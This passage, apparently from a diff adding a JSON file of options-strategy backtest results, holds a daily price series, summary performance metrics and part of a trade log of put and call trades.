"2024-08-08", + 210.5717010498047 + ], + [ + "2024-08-09", + 209.32627868652344 + ], + [ + "2024-08-12", + 210.53216552734375 + ], + [ + "2024-08-13", + 219.0819091796875 + ], + [ + "2024-08-14", + 218.52842712402344 + ], + [ + "2024-08-15", + 229.03526306152344 + ], + [ + "2024-08-16", + 228.55093383789062 + ], + [ + "2024-08-19", + 232.43540954589844 + ], + [ + "2024-08-20", + 229.36141967773438 + ], + [ + "2024-08-21", + 232.6133270263672 + ], + [ + "2024-08-22", + 224.66650390625 + ], + [ + "2024-08-23", + 230.68589782714844 + ], + [ + "2024-08-26", + 224.89382934570312 + ], + [ + "2024-08-27", + 227.38462829589844 + ], + [ + "2024-08-28", + 223.28271484375 + ], + [ + "2024-08-29", + 222.64022827148438 + ], + [ + "2024-08-30", + 228.4619903564453 + ], + [ + "2024-09-03", + 211.02635192871094 + ], + [ + "2024-09-04", + 211.71823120117188 + ], + [ + "2024-09-05", + 210.5815887451172 + ], + [ + "2024-09-06", + 201.56724548339844 + ], + [ + "2024-09-09", + 205.55056762695312 + ], + [ + "2024-09-10", + 207.71517944335938 + ], + [ + "2024-09-11", + 217.36212158203125 + ], + [ + "2024-09-12", + 216.40333557128906 + ], + [ + "2024-09-13", + 220.26803588867188 + ], + [ + "2024-09-16", + 217.3324432373047 + ], + [ + "2024-09-17", + 217.5993194580078 + ], + [ + "2024-09-18", + 215.19747924804688 + ], + [ + "2024-09-19", + 224.3600616455078 + ], + [ + "2024-09-20", + 221.07852172851562 + ], + [ + "2024-09-23", + 221.93844604492188 + ], + [ + "2024-09-24", + 224.62693786621094 + ], + [ + "2024-09-25", + 226.17462158203125 + ], + [ + "2024-09-26", + 234.2596893310547 + ], + [ + "2024-09-27", + 230.54412841796875 + ], + [ + "2024-09-30", + 228.4733123779297 + ], + [ + "2024-10-01", + 222.0726318359375 + ], + [ + "2024-10-02", + 225.0648956298828 + ], + [ + "2024-10-03", + 225.8674774169922 + ], + [ + "2024-10-04", + 228.95880126953125 + ], + [ + "2024-10-07", + 228.3345947265625 + ], + [ + "2024-10-08", + 230.58377075195312 + ], + [ + "2024-10-09", + 232.99143981933594 + ], + [ + "2024-10-10", + 231.35658264160156 + ], + [ + "2024-10-11", + 233.298583984375 + ], + [ + "2024-10-14", + 237.5987548828125 + ], + [ + "2024-10-15", + 225.27296447753906 + ], + [ + "2024-10-16", + 225.27296447753906 + ], + [ + "2024-10-17", + 227.0465087890625 + ], + [ + "2024-10-18", + 227.25460815429688 + ], + [ + "2024-10-21", + 226.8285369873047 + ], + [ + "2024-10-22", + 225.98635864257812 + ], + [ + "2024-10-23", + 223.96505737304688 + ], + [ + "2024-10-24", + 225.21351623535156 + ], + [ + "2024-10-25", + 227.4725799560547 + ], + [ + "2024-10-28", + 227.61129760742188 + ], + [ + "2024-10-29", + 233.20944213867188 + ], + [ + "2024-10-30", + 224.9856414794922 + ], + [ + "2024-10-31", + 216.25648498535156 + ], + [ + "2024-11-01", + 218.55520629882812 + ], + [ + "2024-11-04", + 217.29685974121094 + ], + [ + "2024-11-05", + 219.83334350585938 + ], + [ + "2024-11-06", + 226.24395751953125 + ], + [ + "2024-11-07", + 230.96026611328125 + ], + [ + "2024-11-08", + 229.23623657226562 + ], + [ + "2024-11-11", + 223.49940490722656 + ], + [ + "2024-11-12", + 221.06199645996094 + ], + [ + "2024-11-13", + 216.36549377441406 + ], + [ + "2024-11-14", + 216.2366943359375 + ], + [ + "2024-11-15", + 209.27120971679688 + ], + [ + "2024-11-18", + 211.97616577148438 + ], + [ + "2024-11-19", + 212.38241577148438 + ], + [ + "2024-11-20", + 210.7574462890625 + ], + [ + "2024-11-21", + 214.0965118408203 + ], + [ + "2024-11-22", + 214.18568420410156 + ], + [ + "2024-11-25", + 216.2762908935547 + ], + [ + "2024-11-26", + 213.47227478027344 + ], + [ + "2024-11-27", + 210.60882568359375 + ], + [ + "2024-11-29", + 213.42274475097656 + ], + [ + "2024-12-02", + 219.03077697753906 + ], + [ + "2024-12-03", + 217.79226684570312 + ], + [ + "2024-12-04", + 220.67555236816406 + ], + [ + "2024-12-05", + 216.5041961669922 + ], + [ + "2024-12-06", + 217.81210327148438 + ], + [ + "2024-12-09", + 216.76181030273438 + ], + [ + "2024-12-10", + 211.6095428466797 + ], + [ + "2024-12-11", + 216.9302520751953 + ], + [ + "2024-12-12", + 215.24586486816406 + ], + [ + "2024-12-13", + 221.25021362304688 + ], + [ + "2024-12-16", + 225.3522186279297 + ], + [ + "2024-12-17", + 222.16468811035156 + ], + [ + "2024-12-18", + 213.94776916503906 + ], + [ + "2024-12-19", + 210.35533142089844 + ], + [ + "2024-12-20", + 213.18362426757812 + ], + [ + "2024-12-23", + 219.63412475585938 + ], + [ + "2024-12-24", + 221.89675903320312 + ], + [ + "2024-12-26", + 221.82725524902344 + ], + [ + "2024-12-27", + 219.95169067382812 + ], + [ + "2024-12-30", + 215.6248779296875 + ], + [ + "2024-12-31", + 213.84852600097656 + ], + [ + "2025-01-02", + 215.16839599609375 + ], + [ + "2025-01-03", + 220.77537536621094 + ], + [ + "2025-01-06", + 227.1663055419922 + ], + [ + "2025-01-07", + 224.070068359375 + ], + [ + "2025-01-08", + 221.8372039794922 + ], + [ + "2025-01-10", + 216.53787231445312 + ], + [ + "2025-01-13", + 215.87298583984375 + ], + [ + "2025-01-14", + 217.29208374023438 + ], + [ + "2025-01-15", + 221.5097198486328 + ], + [ + "2025-01-16", + 221.8372039794922 + ], + [ + "2025-01-17", + 227.98997497558594 + ], + [ + "2025-01-21", + 230.6793212890625 + ], + [ + "2025-01-22", + 234.0137481689453 + ], + [ + "2025-01-23", + 233.57708740234375 + ], + [ + "2025-01-24", + 228.88311767578125 + ], + [ + "2025-01-27", + 210.93092346191406 + ], + [ + "2025-01-28", + 211.87367248535156 + ], + [ + "2025-01-29", + 212.74697875976562 + ], + [ + "2025-01-30", + 217.07379150390625 + ], + [ + "2025-01-31", + 216.46841430664062 + ], + [ + "2025-02-03", + 212.56834411621094 + ], + [ + "2025-02-04", + 214.7515869140625 + ], + [ + "2025-02-05", + 218.90966796875 + ], + [ + "2025-02-06", + 218.62188720703125 + ], + [ + "2025-02-07", + 215.21800231933594 + ], + [ + "2025-02-10", + 218.02645874023438 + ], + [ + "2025-02-11", + 218.2249298095703 + ], + [ + "2025-02-12", + 218.4630889892578 + ], + [ + "2025-02-13", + 221.1425323486328 + ], + [ + "2025-02-14", + 221.37078857421875 + ], + [ + "2025-02-18", + 225.0326690673828 + ], + [ + "2025-02-19", + 228.77395629882812 + ], + [ + "2025-02-20", + 229.3098602294922 + ], + [ + "2025-02-21", + 222.2738494873047 + ], + [ + "2025-02-24", + 217.0539093017578 + ], + [ + "2025-02-25", + 212.5782928466797 + ], + [ + "2025-02-26", + 216.2798614501953 + ], + [ + "2025-02-27", + 203.6865234375 + ], + [ + "2025-02-28", + 206.931640625 + ], + [ + "2025-03-03", + 199.6177520751953 + ], + [ + "2025-03-04", + 200.729248046875 + ], + [ + "2025-03-05", + 205.0560302734375 + ], + [ + "2025-03-06", + 196.5314483642578 + ], + [ + "2025-03-07", + 202.2971954345703 + ], + [ + "2025-03-10", + 192.93902587890625 + ], + [ + "2025-03-11", + 190.65655517578125 + ], + [ + "2025-03-12", + 194.5863800048828 + ], + [ + "2025-03-13", + 193.6138458251953 + ], + [ + "2025-03-14", + 199.58798217773438 + ], + [ + "2025-03-17", + 202.88272094726562 + ], + [ + "2025-03-18", + 200.19088745117188 + ], + [ + "2025-03-19", + 201.8204803466797 + ], + [ + "2025-03-20", + 200.21078491210938 + ], + [ + "2025-03-21", + 198.1141815185547 + ], + [ + "2025-03-24", + 203.99658203125 + ], + [ + "2025-03-25", + 202.89364624023438 + ], + [ + "2025-03-26", + 197.20994567871094 + ], + [ + "2025-03-27", + 193.3247833251953 + ], + [ + "2025-03-28", + 187.4821014404297 + ], + [ + "2025-03-31", + 186.97535705566406 + ], + [ + "2025-04-01", + 187.07470703125 + ], + [ + "2025-04-02", + 188.27700805664062 + ], + [ + "2025-04-03", + 169.27841186523438 + ], + [ + "2025-04-04", + 156.62924194335938 + ], + [ + "2025-04-07", + 160.24612426757812 + ], + [ + "2025-04-08", + 153.8768310546875 + ], + [ + "2025-04-09", + 182.4542236328125 + ], + [ + "2025-04-10", + 167.53952026367188 + ], + [ + "2025-04-11", + 171.1663360595703 + ], + [ + "2025-04-14", + 172.29910278320312 + ], + [ + "2025-04-15", + 173.00460815429688 + ], + [ + "2025-04-16", + 166.32725524902344 + ], + [ + "2025-04-17", + 165.4925994873047 + ], + [ + "2025-04-21", + 162.60108947753906 + ], + [ + "2025-04-22", + 165.76089477539062 + ], + [ + "2025-04-23", + 171.9712371826172 + ], + [ + "2025-04-24", + 181.86798095703125 + ], + [ + "2025-04-25", + 183.6366729736328 + ], + [ + "2025-04-28", + 183.3087615966797 + ], + [ + "2025-04-29", + 181.35125732421875 + ], + [ + "2025-04-30", + 182.67283630371094 + ], + [ + "2025-05-01", + 182.42442321777344 + ], + [ + "2025-05-02", + 188.8235321044922 + ], + [ + "2025-05-05", + 187.372802734375 + ], + [ + "2025-05-06", + 185.584228515625 + ], + [ + "2025-05-07", + 188.83346557617188 + ], + [ + "2025-05-08", + 190.52267456054688 + ], + [ + "2025-05-09", + 192.70870971679688 + ], + [ + "2025-05-12", + 206.55027770996094 + ], + [ + "2025-05-13", + 212.40286254882812 + ], + [ + "2025-05-14", + 213.4263153076172 + ], + [ + "2025-05-15", + 212.0550994873047 + ], + [ + "2025-05-16", + 211.77687072753906 + ], + [ + "2025-05-19", + 210.5050048828125 + ], + [ + "2025-05-20", + 210.19696044921875 + ], + [ + "2025-05-21", + 206.35153198242188 + ], + [ + "2025-05-22", + 204.4437255859375 + ], + [ + "2025-05-23", + 201.2739715576172 + ], + [ + "2025-05-27", + 207.96124267578125 + ], + [ + "2025-05-28", + 206.9179229736328 + ], + [ + "2025-05-29", + 207.7625274658203 + ], + [ + "2025-05-30", + 203.6388702392578 + ], + [ + "2025-06-02", + 206.70924377441406 + ], + [ + "2025-06-03", + 212.26377868652344 + ], + [ + "2025-06-04", + 215.423583984375 + ], + [ + "2025-06-05", + 214.51934814453125 + ], + [ + "2025-06-06", + 215.96014404296875 + ], + [ + "2025-06-09", + 221.04763793945312 + ], + [ + "2025-06-10", + 225.8767852783203 + ], + [ + "2025-06-11", + 225.12161254882812 + ], + [ + "2025-06-12", + 225.4296417236328 + ], + [ + "2025-06-13", + 219.55715942382812 + ], + [ + "2025-06-16", + 226.49111938476562 + ], + [ + "2025-06-17", + 224.69862365722656 + ], + [ + "2025-06-18", + 225.6147918701172 + ], + [ + "2025-06-20", + 224.1708526611328 + ], + [ + "2025-06-23", + 225.5649871826172 + ], + [ + "2025-06-24", + 234.11917114257812 + ], + [ + "2025-06-25", + 236.22036743164062 + ], + [ + "2025-06-26", + 238.07260131835938 + ], + [ + "2025-06-27", + 237.86346435546875 + ], + [ + "2025-06-30", + 237.70413208007812 + ], + [ + "2025-07-01", + 236.62864685058594 + ], + [ + "2025-07-02", + 241.12979125976562 + ], + [ + "2025-07-03", + 242.3247833251953 + ], + [ + "2025-07-07", + 237.78379821777344 + ], + [ + "2025-07-08", + 242.3247833251953 + ], + [ + "2025-07-09", + 243.10153198242188 + ], + [ + "2025-07-10", + 245.52139282226562 + ], + [ + "2025-07-11", + 245.14297485351562 + ], + [ + "2025-07-14", + 242.81272888183594 + ], + [ + "2025-07-15", + 245.23260498046875 + ], + [ + "2025-07-16", + 244.56539916992188 + ], + [ + "2025-07-17", + 245.50148010253906 + ], + [ + "2025-07-18", + 245.7006378173828 + ], + [ + "2025-07-21", + 245.9197235107422 + ], + [ + "2025-07-22", + 242.52394104003906 + ], + [ + "2025-07-23", + 241.0501251220703 + ], + [ + "2025-07-24", + 240.55221557617188 + ], + [ + "2025-07-25", + 240.53228759765625 + ], + [ + "2025-07-28", + 244.7247314453125 + ], + [ + "2025-07-29", + 245.1628875732422 + ], + [ + "2025-07-30", + 246.91554260253906 + ], + [ + "2025-07-31", + 239.02859497070312 + ], + [ + "2025-08-01", + 236.250244140625 + ], + [ + "2025-08-04", + 239.3970489501953 + ], + [ + "2025-08-05", + 237.7340087890625 + ], + [ + "2025-08-06", + 235.94149780273438 + ], + [ + "2025-08-07", + 239.83522033691406 + ], + [ + "2025-08-08", + 241.8567352294922 + ], + [ + "2025-08-11", + 241.39866638183594 + ], + [ + "2025-08-12", + 249.1163330078125 + ], + [ + "2025-08-13", + 252.82081604003906 + ], + [ + "2025-08-14", + 253.0797119140625 + ], + [ + "2025-08-15", + 247.2840118408203 + ], + [ + "2025-08-18", + 248.01095581054688 + ], + [ + "2025-08-19", + 244.12721252441406 + ], + [ + "2025-08-20", + 242.72312927246094 + ], + [ + "2025-08-21", + 241.348876953125 + ], + [ + "2025-08-22", + 248.05079650878906 + ], + [ + "2025-08-25", + 247.47320556640625 + ], + [ + "2025-08-26", + 249.803466796875 + ], + [ + "2025-08-27", + 250.29141235351562 + ], + [ + "2025-08-28", + 251.49636840820312 + ], + [ + "2025-08-29", + 244.29652404785156 + ], + [ + "2025-09-02", + 241.81692504882812 + ], + [ + "2025-09-03", + 240.67169189453125 + ], + [ + "2025-09-04", + 243.1513214111328 + ], + [ + "2025-09-05", + 246.01930236816406 + ], + [ + "2025-09-08", + 247.81179809570312 + ], + [ + "2025-09-09", + 248.0209197998047 + ], + [ + "2025-09-10", + 252.39260864257812 + ], + [ + "2025-09-11", + 254.12535095214844 + ], + [ + "2025-09-12", + 254.573486328125 + ], + [ + "2025-09-15", + 256.7244567871094 + ], + [ + "2025-09-16", + 258.0426940917969 + ], + [ + "2025-09-17", + 257.9928283691406 + ], + [ + "2025-09-18", + 267.0140075683594 + ], + [ + "2025-09-19", + 265.30755615234375 + ], + [ + "2025-09-22", + 269.2693176269531 + ], + [ + "2025-09-23", + 268.9499816894531 + ], + [ + "2025-09-24", + 268.5408630371094 + ], + [ + "2025-09-25", + 267.6826171875 + ], + [ + "2025-09-26", + 268.2713928222656 + ], + [ + "2025-09-29", + 268.3711853027344 + ], + [ + "2025-09-30", + 270.556640625 + ], + [ + "2025-10-01", + 275.76580810546875 + ], + [ + "2025-10-02", + 281.10467529296875 + ], + [ + "2025-10-03", + 279.3782653808594 + ], + [ + "2025-10-06", + 287.7608337402344 + ], + [ + "2025-10-07", + 281.3242492675781 + ], + [ + "2025-10-08", + 290.9342346191406 + ], + [ + "2025-10-09", + 289.5870361328125 + ], + [ + "2025-10-10", + 271.4248046875 + ], + [ + "2025-10-13", + 284.278076171875 + ], + [ + "2025-10-14", + 278.4502258300781 + ], + [ + "2025-10-15", + 287.0423278808594 + ], + [ + "2025-10-16", + 288.3795471191406 + ], + [ + "2025-10-17", + 287.57122802734375 + ], + [ + "2025-10-20", + 292.36126708984375 + ], + [ + "2025-10-21", + 290.7246398925781 + ], + [ + "2025-10-22", + 283.53961181640625 + ], + [ + "2025-10-23", + 290.4552001953125 + ], + [ + "2025-10-24", + 295.2452392578125 + ], + [ + "2025-10-27", + 303.4481506347656 + ], + [ + "2025-10-28", + 303.8173828125 + ], + [ + "2025-10-29", + 308.9566955566406 + ], + [ + "2025-10-30", + 304.775390625 + ], + [ + "2025-10-31", + 305.91302490234375 + ], + [ + "2025-11-03", + 307.7392272949219 + ], + [ + "2025-11-04", + 295.6444091796875 + ], + [ + "2025-11-05", + 304.83526611328125 + ], + [ + "2025-11-06", + 296.8818054199219 + ], + [ + "2025-11-07", + 293.768310546875 + ], + [ + "2025-11-10", + 301.37249755859375 + ], + [ + "2025-11-11", + 294.5367126464844 + ], + [ + "2025-11-12", + 299.0473327636719 + ], + [ + "2025-11-13", + 288.7787170410156 + ], + [ + "2025-11-14", + 287.92047119140625 + ], + [ + "2025-11-17", + 282.9707946777344 + ], + [ + "2025-11-18", + 276.40447998046875 + ], + [ + "2025-11-19", + 281.02484130859375 + ], + [ + "2025-11-20", + 267.5429382324219 + ], + [ + "2025-11-21", + 270.2672424316406 + ], + [ + "2025-11-24", + 282.11260986328125 + ], + [ + "2025-11-25", + 282.9907531738281 + ], + [ + "2025-11-26", + 290.7845458984375 + ], + [ + "2025-11-28", + 296.1234130859375 + ], + [ + "2025-12-01", + 296.30303955078125 + ], + [ + "2025-12-02", + 302.2107238769531 + ], + [ + "2025-12-03", + 308.7171936035156 + ], + [ + "2025-12-04", + 305.64361572265625 + ], + [ + "2025-12-05", + 308.7571105957031 + ], + [ + "2025-12-08", + 312.1101379394531 + ], + [ + "2025-12-09", + 311.5313415527344 + ], + [ + "2025-12-10", + 315.6726989746094 + ], + [ + "2025-12-11", + 313.866455078125 + ], + [ + "2025-12-12", + 298.8577575683594 + ], + [ + "2025-12-15", + 297.3907775878906 + ], + [ + "2025-12-16", + 296.01763916015625 + ], + [ + "2025-12-17", + 285.05438232421875 + ], + [ + "2025-12-18", + 291.8601989746094 + ], + [ + "2025-12-19", + 299.6253967285156 + ], + [ + "2025-12-22", + 303.6529235839844 + ], + [ + "2025-12-23", + 304.772216796875 + ], + [ + "2025-12-24", + 305.9515075683594 + ], + [ + "2025-12-26", + 305.8515625 + ], + [ + "2025-12-29", + 305.13201904296875 + ], + [ + "2025-12-30", + 304.7322692871094 + ], + [ + "2025-12-31", + 300.9645690917969 + ], + [ + "2026-01-02", + 313.4968566894531 + ], + [ + "2026-01-05", + 317.8641662597656 + ], + [ + "2026-01-06", + 328.1478271484375 + ], + [ + "2026-01-07", + 324.6899719238281 + ], + [ + "2026-01-08", + 319.3832092285156 + ], + [ + "2026-01-09", + 328.57757568359375 + ], + [ + "2026-01-12", + 330.1466064453125 + ], + [ + "2026-01-13", + 333.0947570800781 + ], + [ + "2026-01-14", + 331.6956481933594 + ], + [ + "2026-01-15", + 337.0123596191406 + ], + [ + "2026-01-16", + 342.2591247558594 + ], + [ + "2026-01-20", + 337.1423034667969 + ], + [ + "2026-01-21", + 347.9256591796875 + ], + [ + "2026-01-22", + 348.455322265625 + ], + [ + "2026-01-23", + 344.49774169921875 + ], + [ + "2026-01-26", + 342.8587646484375 + ], + [ + "2026-01-27", + 350.86383056640625 + ], + [ + "2026-01-28", + 360.238037109375 + ], + [ + "2026-01-29", + 360.90765380859375 + ], + [ + "2026-01-30", + 346.0867614746094 + ], + [ + "2026-02-02", + 352.47283935546875 + ], + [ + "2026-02-03", + 345.42718505859375 + ], + [ + "2026-02-04", + 330.17657470703125 + ], + [ + "2026-02-05", + 330.62628173828125 + ], + [ + "2026-02-06", + 348.2954406738281 + ], + [ + "2026-02-09", + 352.55279541015625 + ], + [ + "2026-02-10", + 351.213623046875 + ], + [ + "2026-02-11", + 359.9782409667969 + ], + [ + "2026-02-12", + 351.2835693359375 + ], + [ + "2026-02-13", + 354.4416198730469 + ], + [ + "2026-02-17", + 353.8819885253906 + ], + [ + "2026-02-18", + 357.69964599609375 + ], + [ + "2026-02-19", + 355.62091064453125 + ], + [ + "2026-02-20", + 359.20867919921875 + ], + [ + "2026-02-23", + 356.6003112792969 + ], + [ + "2026-02-24", + 361.8171081542969 + ], + [ + "2026-02-25", + 367.7734069824219 + ], + [ + "2026-02-26", + 356.5802917480469 + ], + [ + "2026-02-27", + 352.0730895996094 + ], + [ + "2026-03-02", + 351.8332214355469 + ], + [ + "2026-03-03", + 334.5738830566406 + ], + [ + "2026-03-04", + 341.3297119140625 + ], + [ + "2026-03-05", + 337.5520324707031 + ], + [ + "2026-03-06", + 323.3108215332031 + ], + [ + "2026-03-09", + 336.1628723144531 + ], + [ + "2026-03-10", + 338.60137939453125 + ], + [ + "2026-03-11", + 341.8793640136719 + ], + [ + "2026-03-12", + 329.9866943359375 + ], + [ + "2026-03-13", + 331.1159973144531 + ], + [ + "2026-03-16", + 337.6219787597656 + ], + [ + "2026-03-17", + 340.25 + ], + [ + "2026-03-18", + 338.2900085449219 + ], + [ + "2026-03-19", + 340.20001220703125 + ], + [ + "2026-03-20", + 332.510009765625 + ], + [ + "2026-03-23", + 336.5899963378906 + ], + [ + "2026-03-24", + 341.0199890136719 + ], + [ + "2026-03-25", + 345.25 + ], + [ + "2026-03-26", + 328.8500061035156 + ], + [ + "2026-03-27", + 323.4800109863281 + ], + [ + "2026-03-30", + 309.7900085449219 + ], + [ + "2026-03-31", + 328.6600036621094 + ], + [ + "2026-04-01", + 338.5400085449219 + ], + [ + "2026-04-02", + 339.6099853515625 + ], + [ + "2026-04-06", + 344.1000061035156 + ], + [ + "2026-04-07", + 347.760009765625 + ], + [ + "2026-04-08", + 370.3999938964844 + ], + [ + "2026-04-09", + 378.6300048828125 + ], + [ + "2026-04-10", + 386.6000061035156 + ], + [ + "2026-04-13", + 393.3399963378906 + ], + [ + "2026-04-14", + 401.239990234375 + ], + [ + "2026-04-15", + 401.8599853515625 + ], + [ + "2026-04-16", + 405.95001220703125 + ], + [ + "2026-04-17", + 415.7099914550781 + ], + [ + "2026-04-20", + 417.54998779296875 + ], + [ + "2026-04-21", + 420.70001220703125 + ], + [ + "2026-04-22", + 431.7699890136719 + ], + [ + "2026-04-23", + 441.0 + ] + ], + "metrics": { + "total_return": 82.58262687272196, + "final_value": 18258.262687272196, + "cagr": 12.745528306445731, + "sharpe": 1.1275366823048862, + "max_dd": -16.264107117768305, + "n_trades": 163, + "wins": 138, + "losses": 25, + "win_rate": 84.66257668711657, + "avg_win": 91.35471130883936, + "avg_loss": -372.0593879271597, + "chain_quotes": 0, + "bs_quotes": 584 + }, + "trade_log": [ + { + "date": "2021-04-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.99, + "spot": 38.95344924926758, + "premium": 1.583975684423832, + "close_cost": 0.036550750732423865, + "pnl": 148.76249336914083, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2021-04-26 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 36.62, + "spot": 40.952056884765625, + "premium": 1.4881455343351568, + "close_cost": 0.48908288685661905, + "pnl": 93.92626474785378, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2021-05-06 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 33.65, + "spot": 34.34500503540039, + "premium": 1.3654803645791969, + "close_cost": 0.5445321085566537, + "pnl": 76.11482560225431, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2021-05-14 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 33.68, + "spot": 30.978418350219727, + "premium": 1.367604684899412, + "close_cost": 2.701581649780273, + "pnl": -136.38769648808614, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2021-05-21 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 31.6, + "spot": 33.122554779052734, + "premium": 1.7750148450241312, + "close_cost": 1.522554779052733, + "pnl": 22.256006597139823, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2021-06-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 36.24, + "spot": 37.87653350830078, + "premium": 1.3045650460783502, + "close_cost": 0.09306155437631958, + "pnl": 115.17034917020307, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2021-07-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 33.52, + "spot": 35.742088317871094, + "premium": 0.6212159730243201, + "close_cost": 0.26297629503010267, + "pnl": 29.843967799421737, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2021-07-28 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 37.89, + "spot": 39.95274353027344, + "premium": 0.7527238343826177, + "close_cost": 0.22044411622927562, + "pnl": 47.24797181533421, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2021-08-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 40.48, + "spot": 43.862648010253906, + "premium": 0.8291420546593784, + "close_cost": 0.31791583009650637, + "pnl": 45.1426224562872, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2021-08-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 42.53, + "spot": 42.184200286865234, + "premium": 0.7725336248315813, + "close_cost": 0.34579971313476676, + "pnl": 36.69339116968145, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2021-10-07 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 36.54, + "spot": 39.18629455566406, + "premium": 0.649247422476936, + "close_cost": 0.03608903480472936, + "pnl": 55.335838767220665, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2021-10-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 35.87, + "spot": 39.826622009277344, + "premium": 0.7678820898749112, + "close_cost": 0.00896090361952917, + "pnl": 69.9121186255382, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2021-10-18 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.16, + "spot": 41.582679748535156, + "premium": 0.9710834490007247, + "close_cost": 0.3200203879175776, + "pnl": 59.12630610831471, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2021-10-25 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 40.17, + "spot": 43.717124938964844, + "premium": 0.8886825912498413, + "close_cost": 0.3294455404536949, + "pnl": 49.94370507961463, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2021-11-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 43.46, + "spot": 48.47108459472656, + "premium": 0.6847553428756381, + "close_cost": 0.05347765715843522, + "pnl": 57.14776857172029, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2021-11-29 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 55.97, + "spot": 66.37124633789062, + "premium": 1.3059202490232877, + "close_cost": 0.10715412560789472, + "pnl": 113.8966123415393, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2021-12-07 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 57.39, + "spot": 69.84452819824219, + "premium": 1.4853327905017721, + "close_cost": 0.0504788781946266, + "pnl": 137.50539123071457, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2021-12-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 61.65, + "spot": 66.0898666381836, + "premium": 1.9784162422604403, + "close_cost": 0.6381468863876556, + "pnl": 128.04693558727848, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2021-12-21 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 53.77, + "spot": 61.62255096435547, + "premium": 2.345584776381177, + "close_cost": 0.43188338198748166, + "pnl": 185.39013943936953, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-01-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 62.04, + "spot": 69.96827697753906, + "premium": 2.6019075529537545, + "close_cost": 0.811118979929816, + "pnl": 173.09885730239387, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-01-11 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 54.5, + "spot": 61.41876220703125, + "premium": 2.184334684379916, + "close_cost": 0.38278675888806735, + "pnl": 174.17479254918487, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-01-21 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 58.82, + "spot": 42.41766357421875, + "premium": 1.794297114069085, + "close_cost": 16.40233642578125, + "pnl": -1463.7939311712166, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-01-25 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 43.27, + "spot": 39.00173568725586, + "premium": 2.344437425938665, + "close_cost": 0.3583874719931588, + "pnl": 192.6249953945506, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-02-04 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 38.02, + "spot": 42.17505645751953, + "premium": 2.3807904083429037, + "close_cost": 4.155056457519528, + "pnl": -180.41660491766245, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-02-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 39.64, + "spot": 45.22221374511719, + "premium": 2.4363389014270016, + "close_cost": 0.5970024983692026, + "pnl": 177.9536403057799, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-02-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 36.07, + "spot": 44.6496696472168, + "premium": 2.51831014590066, + "close_cost": 0.2793051871996268, + "pnl": 217.92049587010334, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-02-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 36.15, + "spot": 38.759124755859375, + "premium": 2.5535341024460685, + "close_cost": 0.4436599267164798, + "pnl": 205.00741757295887, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-03-04 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 38.11, + "spot": 33.741981506347656, + "premium": 2.4978235314021173, + "close_cost": 4.368018493652343, + "pnl": -190.0094962250226, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-03-07 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 34.42, + "spot": 28.70543670654297, + "premium": 2.576796760255144, + "close_cost": 0.40354564100297097, + "pnl": 211.3451119252173, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-03-18 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 30.38, + "spot": 38.01189041137695, + "premium": 2.456815747246292, + "close_cost": 7.631890411376954, + "pnl": -520.4974664130661, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-03-22 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 35.73, + "spot": 38.42637252807617, + "premium": 2.288021985248074, + "close_cost": 1.0810912589807646, + "pnl": 114.71307262673092, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-03-29 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.33, + "spot": 44.24032211303711, + "premium": 